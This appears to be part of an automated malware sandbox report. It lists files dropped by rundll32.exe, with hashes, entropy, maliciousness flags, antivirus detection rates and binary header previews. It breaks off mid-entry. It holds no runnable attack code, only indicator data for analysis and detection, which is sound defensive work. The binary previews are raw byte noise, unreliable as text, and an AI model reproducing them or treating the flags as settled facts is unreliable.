                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....f............" .........0...............................................@............`.......................................................... ..0............@..P%..............T............................................................................rdata..............................@..@.rsrc...0.... ... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):587096
                                                                            Entropy (8bit):5.955146470563534
                                                                            Encrypted:false
                                                                            SSDEEP:6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
                                                                            MD5:2776A2B1C9D82F3FEBAA8CA1F5544992
                                                                            SHA1:28620B6498EEFA4E411686FEAC1C0E03D66B661D
                                                                            SHA-256:D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
                                                                            SHA-512:2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...................................................................................Rich............................PE..d...+WSF.........."..........P.................@..................................................... ...........................................................6......X%......x...TY..T......................(.......@...............`............................text...L}.......................... ..`.rdata..............................@..@.data...`Q...0...P...0..............@....pdata...6.......@..................@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:ASCII text, with very long lines (467), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1091
                                                                            Entropy (8bit):4.900567214358779
                                                                            Encrypted:false
                                                                            SSDEEP:24:8uSJLsnMRsAvARsADXWBDk44IuNhbgU0E+4HQk1LpsLtbY:89LsnMRsgARsqXWBDB4Tvr06H319ou
                                                                            MD5:314CE81BED1547B8FA40F405F4C8B9FC
                                                                            SHA1:6A1A717B275B90BA77A43EF77FCDEDBC7E6F7CE2
                                                                            SHA-256:00D799DC04FBDF92BC39218C22723C61C3204A82B1FC418E6AEA65E6ED111CE8
                                                                            SHA-512:143A0D92659BB088F2282BDB14F465D58EA9E0E57D261741CC9AC7B507BE730F4B0A62E9A9BF0B73BF19FDF6F44F2977E2C77875E28AC30E461155BDDB59A047
                                                                            Malicious:false
                                                                            Preview:Files originating with or related to Casablanca v2.6.0, a "Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services." See https://github.com/Microsoft/cpprestsdk. This material is licensed under the terms of the Apache Software License v2.0 (see https://github.com/Microsoft/cpprestsdk/blob/master/license.txt), which state:.... ==++==.... Copyright (c) Microsoft Corporation. All rights reserved. .. Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. .. Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):142
                                                                            Entropy (8bit):6.55447018279355
                                                                            Encrypted:false
                                                                            SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                            MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                            SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                            SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                            SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                            Malicious:false
                                                                            Preview:H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):2560
                                                                            Entropy (8bit):3.2580418248791343
                                                                            Encrypted:false
                                                                            SSDEEP:24:eH1GSp85gpXsFCZIN/at1IyBIZW0sTf5cnaw7ScNffz745U35WWdPfPN3Tc:ypK2BZ+W1I8IZWPTf5EdHffA5K5Ww13g
                                                                            MD5:EE08DF3A08F49B9A7239F0DE796E5DD0
                                                                            SHA1:461A532C71E6C20FB529F340CDF89DB4845200AF
                                                                            SHA-256:5959174D18270B856CF01B69223623E231AEF539F71B20336E0BE764F4C632F5
                                                                            SHA-512:7E6274FB38113EF69B132C5687EC4E08FFD09A4C1CA85B82441470D20AABBB55814E97EF8EE6DFA08A377719FB71ABA6A94F1217554C3463173AF12F93038222
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0.......|....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):50688
                                                                            Entropy (8bit):3.394595207496583
                                                                            Encrypted:false
                                                                            SSDEEP:768:QJbyt33c7EhrdTTm147vXahEzhEthEGQRQwhEfSm:QJbytHu6rdd7vM+4Ivm
                                                                            MD5:4CFEF0FE4901B062F4B169B97F8CFD31
                                                                            SHA1:3ABE261FA1E8625FE3155B0D4B98D0D5903E1E1C
                                                                            SHA-256:5A89EBF5211FE4E51ED4D5D8FE1FEEC591A67F2F1632C6C0873CB44028386F43
                                                                            SHA-512:B1D8D65B6E781019618119F71500EC082018E11DF5562C878E34E1EC54FEF770F6B9F095A10D22B550FE137F1177057B507A1845048BA170EC762AAFB21D52CA
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................~e....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):43520
                                                                            Entropy (8bit):3.4967857595832523
                                                                            Encrypted:false
                                                                            SSDEEP:384:ZtOioFEr4H1O/Dtkby/g1mwhqfB9hy0VkkWoBFH1ANl8CWupBW4:MBHI//1ANl8yp5
                                                                            MD5:FF86B38C73EED57883F04E1E61C3A213
                                                                            SHA1:6DD75F604393D70288AA1E28392AB83701B67650
                                                                            SHA-256:A7303F3077D7890C7CB889C7DD4A913BB0E5AB94E8DD190F258C85BF0A81AC28
                                                                            SHA-512:AAD695468C28F5E02DF5171294151BFA3A96D97203661C7278B4F2D37C167D8A6DE48A6AE9E50BCA6083A5E968497FEFC7526B2FCAB1A1F2396421A187CA798E
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... .................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8704
                                                                            Entropy (8bit):3.57992330655092
                                                                            Encrypted:false
                                                                            SSDEEP:192:WWFmd28sT8KF7Y1+z7YNiuErC0IQ3obWNfpW7:zYd28sT1F7Y1+z7YNiuErC0IQ3YWNfp0
                                                                            MD5:E38287B098C2A55EE69A224BE73C93E8
                                                                            SHA1:0422464BBDA490FBC74896494318B5A141CF2710
                                                                            SHA-256:B61780AE34673BF797B85387036E01A03DB9F3D949BC23AD87EFD0A1D7EBA03E
                                                                            SHA-512:9126D8CDA5E1E898D443B9A6B8757F0FC205E599DE84241C0F0418857FA0D30DE1885AD5D04E539476500C15C6BEB4E2AB438564B7A6DDD3E7A898621059C6C6
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):7680
                                                                            Entropy (8bit):3.529446079422097
                                                                            Encrypted:false
                                                                            SSDEEP:96:ZqJtrkDSJ6Spy99V9KzEcEKLqmqYgAMkL1J+8PUnW4+EW6brWwg:ZqJOvDAzzgYR7AW4TW6brWD
                                                                            MD5:D186BEDACDCCA084DA65C65D598EBCA8
                                                                            SHA1:3C48928EC8FE199545C0AD5ADEE27A5AC61E3D99
                                                                            SHA-256:363B8713FA608B54832C5F78E17331D94F0E888B98A0337467B5B1A5A18E7B75
                                                                            SHA-512:4B1774C4200BCD1161C8B00A9D5FFF11B6FDE35559531A578DA0EE6ED97A255FFF4FFC2B3C1E28DFCCCD2D77E616B92F91749F4BFD2999C105A00809C2D1359E
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):35840
                                                                            Entropy (8bit):3.534239180172005
                                                                            Encrypted:false
                                                                            SSDEEP:768:zFMCgGn67PzUf+YXIurmXuQmMVhjhxpIE:z2CpjZXIVXPiE
                                                                            MD5:3C50201BA7B59C83412E463689D9798B
                                                                            SHA1:A97F6D79D365B72F0AADCF2EA0B77C1FBD0940E3
                                                                            SHA-256:DD449C37F48009C37ADA9339185E8B30A50CC97F17E2979AFBE04B9A40F2B26A
                                                                            SHA-512:32DFF7044961E0254E38D592734F1B2566D4F079DE1611C6866F437F7DA9F2B257A89CA84C46D832B8CCA394866BF60B6203DAC2DD680C11FAC17A2D72BB23EC
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................d....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (11632), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):95866
                                                                            Entropy (8bit):3.503699910346522
                                                                            Encrypted:false
                                                                            SSDEEP:768:r7EIEB87ovwzUHfRWKXdxXMJHro8ozUUCaOZ5f5XPu1QcQBQEY46bY4814OT6/5k:rK4GXMa4BXPrY46bY48iOO/2
                                                                            MD5:675269F40380DCD00A2E2144A57F610A
                                                                            SHA1:B663129AD88776319E98519784CE2B21765AB196
                                                                            SHA-256:87E91B7FE6743B8DF9379E109B543D5BF6F41AB16198BB0DAD78D1C249D61B1F
                                                                            SHA-512:0E79DE4580FBC1E44DEB12AF91052125D0860574C4B2CBD9DCFB6F02DA6A568BCD11C34E35EAF403E78F112FC532FE5138C5FE0E5D43348483BD5A72F93DD65D
                                                                            Malicious:false
                                                                            Preview:..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.0.9.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1118
                                                                            Entropy (8bit):3.459513705694916
                                                                            Encrypted:false
                                                                            SSDEEP:24:QXbclTUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvlR:enjDGwJ3r24RFZC
                                                                            MD5:AFE6664D26D5D05B4568E329BE37D7DE
                                                                            SHA1:2F6FD02E26E9F3A09866F3C106A8C1539B50D46F
                                                                            SHA-256:B6BAC201F1586B4C357521C46421086557A0DF86A022B120B723EB047E450D43
                                                                            SHA-512:8C1AF20BF892C303F8247B6E991A96A59CB0C65AB7E11C630282AA1B091FAEA8B27AA08210249FE2B47FA9488834E82487490581B54B236461FE61CF346F623E
                                                                            Malicious:false
                                                                            Preview:..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):3.3889790046988564
                                                                            Encrypted:false
                                                                            SSDEEP:48:ypY55M0IyyS/kVrx1TIZWqHWq6sffm0/iy5Ww13/:73IakVrvTEWiH5Wwd
                                                                            MD5:C99D5885AAB799E23E6E5498D0D1B07C
                                                                            SHA1:33450BDC3CDA46CEC0AF5467826143C46624E597
                                                                            SHA-256:C789A39DE6F9DF1A85BDB495D7F9955E1F673FBDBC0B77863D4595A4C4DA82F4
                                                                            SHA-512:8E583EBCC5A867E38BBB0A8A9EE40976AE949A130E2C4DB7B7CB82B3E815E3E785E15411BA4AADCF84ABCA8783E02D09FDDBAE736C3F326EC851D1B2193EC3B8
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0......W.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):685328
                                                                            Entropy (8bit):6.2613956335812
                                                                            Encrypted:false
                                                                            SSDEEP:12288:pRCT1SH7y45rUcOoza9hW+WSAh7Z1a6MLoloKfihqPgwX:pySH7yGUI+WL7ra6MLolrfihqh
                                                                            MD5:113DB043FE13F4635D0A65FDF100CFD3
                                                                            SHA1:1DF847E5E1680669FE0DF779B66942C521B47012
                                                                            SHA-256:716BA8B125E70C4D717262381B3A31203C41442B680651729ADF12059B53123F
                                                                            SHA-512:0B66C78C11DF7FCB8971FDB658D9372E06CC2A0D5AA116864E2D79099E660FB1A9F40368BFE590C6CCE5AA07DA592F89F0327D8EC02467EFBF720860C47BEB16
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..[6..[6..[6...C..Z6..D..N6..[6..x7..D..H6..D..x6..D..6..D..Y6...C..Z6...C...6...C..Z6...C..Z6..Rich[6..........................PE..d.....&..........." .........`......@........................................p............`A............................................<............P..0........P...P...%...`......0...p...................XN..(... M..8............N...............................text...E........................... ..`.rdata.............................@..@.data...h@.......0..................@....pdata...P.......`..................@..@.rsrc...0....P.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8773630
                                                                            Entropy (8bit):7.99997781368023
                                                                            Encrypted:true
                                                                            SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6owng4gB6nho8V9TT:HeZ4N80jwG3W2xR2YP6Meg4gBf8H
                                                                            MD5:51B2093E0B5ED5E5222783D1E118F078
                                                                            SHA1:D698D261CA3B18EE7A6395D4BFF47E7A9D8CCE4D
                                                                            SHA-256:2E5BE87C36974215CAFF5C0C47F862F4DC346AAE3B241120E60BB93ECC5DED7A
                                                                            SHA-512:12542523189F108CE20785ADADE42DFAF59105B6A247AF82FE7F4DA783F457F762BFF9B67862AA258C29867F8E78591DBD05E53A796308199A314ADD5830DA08
                                                                            Malicious:false
                                                                            Preview:H~.Ea..kyJ._.....@....<.=..}.]..A.).W.....".gb...s...lR..4p..ekJ.......n...q.~.P......(J!...v.Ma>.<.+(.r.>...F..g8..k e...Rb..S....w...^.,.`...T.9`zC...?.37..._.Y&!..L.I..H.q..3{S.H........D.v1k.[.^n..-.....J....W.c.#y.G,.U....(V..e..EM...-!f...\.}..}.[.."......z...B.q..'c".o......._...T....~.....D.d......J......9w..b.Kik..H..fSQ........&.`.'.......92:....i...~...^...Q.mQ.;pt...."....r]..).mv...q3....H.I./.v..G.....e.4.z"...UsSn...D...I....S.A:.....|.x...*).b..7){.i0.L.r}V6.....3...._.8..XY~.;..~%....:uc.y".7...%.ip..p.....Li..wh...j._..R:.....4..9......`.._.`....PYC..k1....._$..(a..N..A...\..<./.....E..-...dM........i..y..G3!....0q..C*.cm.R&W?.E@.........V..79.Mf........@.G......"#.....$.......g.b.8...tYQZ...d...~>.?.4.v.O........%.?l...R*.!.\....N..`..(..M....h.7TcQ..1.?`.3.|..sX(;....y`..cd..K.....B..|...X.8.......6q.`.....J...2P./G.<...^}....S.'.......J#.....q.k]Zg%..+.@.'[...cE7....g......2w<.J....1s]##....n..!.U..#.. ..6"
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):8773630
                                                                            Entropy (8bit):7.9960409978876035
                                                                            Encrypted:true
                                                                            SSDEEP:196608:sL/pb5vj/q8cFmGRouNMASrmNOpzEPbL56gRLDh+qil1n2vtfc/m5:6h5vD0JRTPux4ZLsZ7Ab
                                                                            MD5:62F22685BB0932A16A23312806F3C8EF
                                                                            SHA1:AE6FF7EC264721A964B0676E23E6154AAF37E760
                                                                            SHA-256:6E3F48F0746BB21BE252608750D848614465AA76C79A8EBB362907D3E4F527A7
                                                                            SHA-512:7915451CA40598E5639A3774ACEF8C87BD7A70123B7538543232B3F6D4770CACDEB1C555D80C68AB51F38A2DAE34EC4CE778AC7D3106A946A7EA33A8E447E37B
                                                                            Malicious:false
                                                                            Preview:PK........e..T*.u.bp..PE......AMMonitoringProvider.dll.Z{xTE..~..!inc.. ..:.0d"-..2_7$K5.h..0 ..00*$...a....l.......e..>..qd1.;....cP.8..vl......=...G......n.n..y.S.n'.p31.B..(.!UD-n..%.........GU..f-]..^R...e.>a/zt...>....e...e....?.bqq....a..^LG7E..g.j\....Kx...^|....oo\......8...hR....eEK./*kA.!..=...+.D...h{.~..B. ....>..Xxs..O...x.2...4#.o.G..J..U1...d...v#...lNAa...V4...d..].!......,...d,....V...u..a.........i..:^.,.,[...QB..CX.&....|......7jX.=.B.%*!.M.......,+"D....f....E...m.....T.W.J_.+}......W.J_.+}..cZ)..g.....4hN.VGZ...Xo.g-7...`.=....iP..zBe.....@....T.*.k.I.....C#...-.{..;.w..........C....4Z.....]rkS.k.......n.:..MA.@...Z..{F..>B....F...&G...87..;..Y@>q....z.s7^.Ezd.Y>.A....m.@$...)'`~.$..@F...Z.~......N}F..w._..7O...zR....)..$eQ....e..4G...q"...*...z"..%h.R.......H8..'u.B....~..T....Bh..s./....D.@.T..l.......A...&O..c85..8.#.....s.~......D.k.4m..........wqe..'.b2...o.o:.e..Wq..p>...Pq.....&.p.9N-...qj4.6[.gG.G...6..
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):3.688226991598996
                                                                            Encrypted:false
                                                                            SSDEEP:24:eH1GSp8zgpXLUCZIN/G15JqZW0Iyc5ArqA5+DScNffzJ2Uh7/5L3guolb9fPN3Tu:ypA2zZ+G1zqZW7PA5afff5TN4x93S
                                                                            MD5:66D970ACC9C33581B9E3152CDF46C707
                                                                            SHA1:7C3ACD65D71B94837B837DFB52C1FC48E8B98F0C
                                                                            SHA-256:36F0DA44D38A45FD585CFC84B03C00185DB00F103A655821B5BD6FCCD88EB426
                                                                            SHA-512:C154E38181825C9F844ECEBAC6213FBA9C2792849097451758FCE11D728763135CA0211BB91BFADA310B2C371D77B25E6BD4CA131AD8E72815543A2F7909DFB2
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):55808
                                                                            Entropy (8bit):3.370538627905652
                                                                            Encrypted:false
                                                                            SSDEEP:384:8ELIoHwex9cxks8ntGfFDD4vlzAQQ+8+jBUJ3P+/npK5sD8XOHKXSXSXuCilXYMY:dLIoHwex9cxMtOkA3+FRpKIl5i
                                                                            MD5:50C3A70FA84C07A424EC3D2834D06523
                                                                            SHA1:4FD26B0566F31172BAC62B839ED5CB62B6625AD5
                                                                            SHA-256:95A2C437329C4C4DF4919152BC90284A90857122E4B9C868C36F103ACC52A028
                                                                            SHA-512:DE9358CE4269187C60F9CFD7E4B913747A403BC2F069C877E220AED02B63AFEC6BA115B4F79C1BBD4AC80DCFBBDBFC1739DDE34983D8DC0A10B027B41142CB91
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................6V....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):47104
                                                                            Entropy (8bit):3.506031927133505
                                                                            Encrypted:false
                                                                            SSDEEP:384:RXSmktkGpXilFdOUry+KoK2o4XqPA/RDkVQyiQ8oiKEu8+k9Ko8uWJl:E5tVD0DuZl
                                                                            MD5:CE84B2A9F6DF190FA977504B51536808
                                                                            SHA1:08EC7406B12042AD09EE7D3124863A57CE30F197
                                                                            SHA-256:A7224212D1D6FEC1558709633EBB1580CFB6CAB230624F548239A974C7A0D6AF
                                                                            SHA-512:5F68ABC2DB6A92D195D656695A22FC5C01F135263966567227A7771F3ECA4B7690BB5278B49B30E8BD11EE4124D29F943241E0AA5A69B69FB5202DCDD2B80841
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................q.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\rundll32.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8704
                                                                            Entropy (8bit):3.583197744926803
                                                                            Encrypted:false
